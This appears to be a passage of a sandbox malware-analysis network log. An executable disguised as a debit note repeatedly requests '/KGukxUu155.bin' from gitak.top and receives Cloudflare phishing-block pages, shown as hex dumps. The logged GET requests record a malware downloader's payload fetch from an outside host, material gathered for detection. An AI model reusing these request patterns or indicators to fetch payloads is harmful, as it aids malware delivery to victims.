                              2024-08-26 13:32:24 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 55 55 6d 47 69 6b 42 70 4e 31 63 6c 47 51 7a 6c 77 72 4f 45 70 62 6e 31 61 61 6b 73 45 4f 6c 70 46 66 4b 41 4f 62 56 42 2e 6b 6b 2d 31 37 32 34 36 37 39 31 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="UUmGikBpN1clGQzlwrOEpbn1aaksEOlpFfKAObVB.kk-1724679144-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:32:24 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:32:24 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.11.2049819172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:32:34 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:32:34 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:32:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pgno87otjhinuC0ydtfGEvSF0MnSortLLmRC%2F8zi17ctFRhSLYTKzubMIiT8afP49pBAtVASF%2Fsdqc7OEQ%2FFaE7Ukn6oF6cyG8vEyZLZ0uVy2wt%2FEK3lWj%2Fz8k%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94304dd93cc989-IAD
                              2024-08-26 13:32:34 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:32:34 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:32:34 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 55 33 41 78 74 34 47 6f 30 4a 57 41 5f 73 45 71 62 4a 75 7a 6f 43 6a 41 4e 55 35 4d 75 64 46 6f 65 37 70 53 6a 47 73 4a 44 35 4d 2d 31 37 32 34 36 37 39 31 35 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="U3Axt4Go0JWA_sEqbJuzoCjANU5MudFoe7pSjGsJD5M-1724679154-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:32:34 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:32:34 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.11.2049820172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:32:45 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:32:45 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:32:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JbPzkgrUQ088oxM6bYSOwNi4IKtbjnnXiLuiydvCjr9Hgg%2FJyafOOlwgpQzdIOWCZ8PwYlPO%2F2GCwqBTL2aBvwXv3tNLSLsToHP47FZKXBQhZMZItRpXw%2FXmArA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94308fb88fc983-IAD
                              2024-08-26 13:32:45 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:32:45 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:32:45 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 50 50 72 43 58 56 77 5f 6e 6e 65 78 6a 67 34 6d 32 75 55 38 57 63 4b 78 62 6d 67 7a 5a 37 6c 4b 77 6b 4d 48 31 43 67 76 45 4f 51 2d 31 37 32 34 36 37 39 31 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="PPrCXVw_nnexjg4m2uU8WcKxbmgzZ7lKwkMH1CgvEOQ-1724679165-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:32:45 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:32:45 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.11.2049821172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:32:55 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:32:56 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:32:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCKic73ZccIhBRnrSxVAm11XNxAaCfBc2F6rEJ4TwqkTwQgbIw2f2Ce1SKOpZV9VMwvd2frv0Axf6AFZ%2FP%2BOGywtDZC%2FRg%2F1NnThd5JSzS07e7rHlCE9t0vgGOw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9430d1aa890802-IAD
                              2024-08-26 13:32:56 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:32:56 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
                              2024-08-26 13:32:56 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 38 4c 4c 45 6d 77 62 78 4c 37 55 37 79 68 55 50 33 76 37 56 6f 58 33 4f 66 41 51 6e 37 61 55 33 32 42 69 36 64 38 56 43 46 6b 51 2d 31 37 32 34 36 37 39 31 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="8LLEmwbxL7U7yhUP3v7VoX3OfAQn7aU32Bi6d8VCFkQ-1724679175-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:32:56 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:32:56 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.11.2049822172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:33:06 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:33:06 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:33:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W%2FeaZu%2FCVcMQtMa%2FnTvr8HNX8aEh2pgNTHnsrV5qYTIhVakr1GJBsc7Aui1XQkQK4JDaL9dzeUiYNP5uV7L8OTe8tP0RD8Ov7abu0mVe6kaMOv9nMN4BITOZ3M%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943113782705a8-IAD
                              2024-08-26 13:33:06 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:33:06 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
